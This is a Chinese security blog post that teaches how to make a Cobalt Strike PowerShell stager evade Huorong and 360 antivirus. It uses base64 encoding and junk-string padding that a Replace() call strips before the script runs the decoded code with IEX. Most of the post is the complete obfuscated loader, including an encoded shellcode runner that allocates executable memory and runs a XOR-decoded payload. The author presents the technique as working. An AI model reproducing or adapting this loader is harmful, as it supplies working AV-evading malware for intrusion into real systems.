免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换
免杀
免杀安全
发布日期:   2022-08-07
作者:   Shmily
文章字数:   533
阅读时长:   2 分
阅读次数:  

免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换

PowerShell-文件模式-编码过某绒

这里用的cs做演示

1.Powershell—payload是文件模式–上线代码在文件,利用Powershell去执行这个ps1文件上线

2.Powershell Command—-payload是执行模式—-直接执行命令(有上线代码)

首先原生态的powershell文件模式,肯定是直接被杀,识别出来的

因此,我们来观察其中的代码,找出被观察出来的特征,然后将他修改,经过验证发现这串代码是被识别出来为后门的主要特征

我们直接将这串代码进行base64加密,然后在利用powershell语法将它解密

$bb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($x))

最后做出结果为

在来进行验证,看是否还能被识别出来,直接成功绕过火绒,运行后,也是成功上线cs,说明成功修改

PowerShell-文件模式-填充垃圾数据过某60

1.直接在base64编码上添加,然后解码前进行还原

2.直接在原型代码上进行添加,然后解码后进行还原

我们将过某绒的powershell代码,放到某60去扫描,可惜的是没过掉,直接识别出来

这个时候我们经过发现,还是base64加密的那串代码被识别了出来,于是我们就想到往里面填充垃圾数据,比如(将shmilyishacker)在里面到处添加,如下图

ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1shmilyishackercmUpCQkKCSR2YXJfdWshmilyishacker5zYWZlX25hdGl2shmilyishackerZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tshmilyishackerYWlushmilyishackerLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmshmilyishackerx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxshmilyishackerpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJshmilyishackerykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNshmilyishackerZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTshmilyishackerZXJ2aWNlcy5IYW5kbGVSZWZdKE5lshmilyshmilyishackerishackerdy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnshmilyishackerZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSshmilyishackerkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kshmilyishackerdWxshmilyishackerlKSkpKSwgJHZhcshmilyishackerl9wcm9jZWR1cmUpKQpshmilyishacker9shmilyishackerCgpmdW5jdGlvbshmilyishackeriBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0shmilyishackergJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpshmilyishackershmilyishackerTdGFuZGFyZCwgJHZhcl9wYXJshmilyishackerhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvshmilyishackerZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LshmilyishackerCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRshmilyishackerhdGlvbkZsYWdzKCshmilyishackerdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlXshmilyishacker2J1aWxshmilyishackerkZXIuQ3JlYXRlVHlwZSgpshmilyishackerCshmilyishackern0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2shmilyishackerNFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZshmilyishackershmilyishackershmilyishackerPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndshmilyishackerkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TshmilyishackerkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2tzbkJDTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0oshmilyishacker5RXR6MkV0eDBTU1J5ZFhshmilyishackerOTGxIVEshmilyishackerRLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNWjBKRmNpTXkrdStRVGNkRnshmilyishackerh4QWt6dGdROXNFN2llaHhoTFQxshmilyishackercEpDWE9tbjFVVG5GTWUvOXpDNzRsZ3dtNWluWitaK3RQSkVycWhNYXR3eVRWeU5rbzVjNCtqeTJteEFKV205ejBvUHZJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkshmilyishackerS1FVOUdHQU51Y0dwshmilshmilyishackeryishackerbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM2RSU2tkR1RWY01GZzBUR0FOdlptMFJDaTRwSTBUVkVDeGJldlRBQjh3NTRmUCtDa2crb2w2Y0lpd0lDN21HcnFrT00rWmZLZ1BMMER1TmduS0h5SHBJZ25ya1Y4cmdXd3RRcHE3RshmilyishackerXpWNnhOQ3BshmilyishackerCem1JN2t1dDQ2bmhjS3ViVGc5K1ZOTVhwZXJkRlJycUlHdjdLMjZzbWFKc1hSZTRWdExRdzVWdVI2TXArbGJjQ2Z4NlJ1K2k2aGNTdUZETUxjNERvc1JVWkxpVThXdW1wQXYvRTRidnZ2SWlodDVJcCtyeG9aczQvKzdaWXZMSUpSQmVxREsxWVMyZ3RlZStxOshmilyishackerFZUQmFaL0RHNzA2bDN4ZFM5dWJxQWk3ZGdyZGpuQjlZYWw5SkM2Z1ZkaS9qdzhjdWVLaFVZUE1tYjk3NzFNa0RTTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dshmilyishackerGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNGeFFORWhNshmilyishackerYURSQVFEUkliRnlNaklxV0QnKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1shmilyishackerbmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWshmilyishackerxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSWshmilyishacker50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlshmilyishackerbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhshmilyishackerdGVGb3JGdW5jdGlvblBvashmilyishackerW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZshmilyishackerF0pKSkKJHZhcl9ydW5tZS5JbnshmilyishackerZva2UoW0ludFB0cl06Olplcm8pshmilyishacker

添加后,在放入某60识别,成功绕过检测

那么问题来了,我们添加了垃圾数据,想解码出来肯定是不可能了,所以我们就想到先将我们加入的垃圾字符进行去除后,在解码,于是就用

replace()函数
Set-StrictMode -Version 2

$DoIt = @'
ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1shmilyishackercmUpCQkKCSR2YXJfdWshmilyishacker5zYWZlX25hdGl2shmilyishackerZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tshmilyishackerYWlushmilyishackerLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmshmilyishackerx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxshmilyishackerpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJshmilyishackerykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNshmilyishackerZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTshmilyishackerZXJ2aWNlcy5IYW5kbGVSZWZdKE5lshmilyshmilyishackerishackerdy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnshmilyishackerZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSshmilyishackerkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kshmilyishackerdWxshmilyishackerlKSkpKSwgJHZhcshmilyishackerl9wcm9jZWR1cmUpKQpshmilyishacker9shmilyishackerCgpmdW5jdGlvbshmilyishackeriBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0shmilyishackergJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpshmilyishackershmilyishackerTdGFuZGFyZCwgJHZhcl9wYXJshmilyishackerhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvshmilyishackerZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LshmilyishackerCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRshmilyishackerhdGlvbkZsYWdzKCshmilyishackerdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlXshmilyishacker2J1aWxshmilyishackerkZXIuQ3JlYXRlVHlwZSgpshmilyishackerCshmilyishackern0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2shmilyishackerNFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZshmilyishackershmilyishackershmilyishackerPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndshmilyishackerkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TshmilyishackerkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2tzbkJDTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0oshmilyishacker5RXR6MkV0eDBTU1J5ZFhshmilyishackerOTGxIVEshmilyishackerRLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNWjBKRmNpTXkrdStRVGNkRnshmilyishackerh4QWt6dGdROXNFN2llaHhoTFQxshmilyishackercEpDWE9tbjFVVG5GTWUvOXpDNzRsZ3dtNWluWitaK3RQSkVycWhNYXR3eVRWeU5rbzVjNCtqeTJteEFKV205ejBvUHZJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkshmilyishackerS1FVOUdHQU51Y0dwshmilshmilyishackeryishackerbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM2RSU2tkR1RWY01GZzBUR0FOdlptMFJDaTRwSTBUVkVDeGJldlRBQjh3NTRmUCtDa2crb2w2Y0lpd0lDN21HcnFrT00rWmZLZ1BMMER1TmduS0h5SHBJZ25ya1Y4cmdXd3RRcHE3RshmilyishackerXpWNnhOQ3BshmilyishackerCem1JN2t1dDQ2bmhjS3ViVGc5K1ZOTVhwZXJkRlJycUlHdjdLMjZzbWFKc1hSZTRWdExRdzVWdVI2TXArbGJjQ2Z4NlJ1K2k2aGNTdUZETUxjNERvc1JVWkxpVThXdW1wQXYvRTRidnZ2SWlodDVJcCtyeG9aczQvKzdaWXZMSUpSQmVxREsxWVMyZ3RlZStxOshmilyishackerFZUQmFaL0RHNzA2bDN4ZFM5dWJxQWk3ZGdyZGpuQjlZYWw5SkM2Z1ZkaS9qdzhjdWVLaFVZUE1tYjk3NzFNa0RTTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dshmilyishackerGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNGeFFORWhNshmilyishackerYURSQVFEUkliRnlNaklxV0QnKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1shmilyishackerbmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWshmilyishackerxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSWshmilyishacker50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlshmilyishackerbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhshmilyishackerdGVGb3JGdW5jdGlvblBvashmilyishackerW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZshmilyishackerF0pKSkKJHZhcl9ydW5tZS5JbnshmilyishackerZva2UoW0ludFB0cl06Olplcm8pshmilyishacker
'@
$DoIt=$DoIt.Replace('shmilyishacker','')
$bb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $bb | wait-job | Receive-Job
}
else {
    IEX $bb
}

可想而知,也是成功绕过了某60的检测,达到成功上线的目的

   转载规则


《免杀对抗-PowerShell&混淆&分离加载&特征修改&EXE生成&填充替换》 Shmily 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
过安全狗方式上传shell 过安全狗方式上传shell
过安全狗方式上传shell php的异或运算: 2.利用字符的运算符: 3.通过end函数代替[]: 4.通过常量去绕过: 5.字符串拼接+双美元符 6.通过函数定义绕过 7.通过类定义,然后传参分割 name");
2022-08-12 Bypass
WAFpass
下一篇 
免杀对抗-免杀Ctypes-饶过Shellcode&火绒&360&Defender 免杀对抗-免杀Ctypes-饶过Shellcode&火绒&360&Defender
免杀对抗-免杀Ctypes-饶过Shellcode&火绒&360&Defenderpython语言中的ctypes模块是一个专门用来做免杀应用的模块 一.加载器选择-ctypes-DLL引用&执行C代码一般
2022-07-13 免杀对抗
Hacker
  目录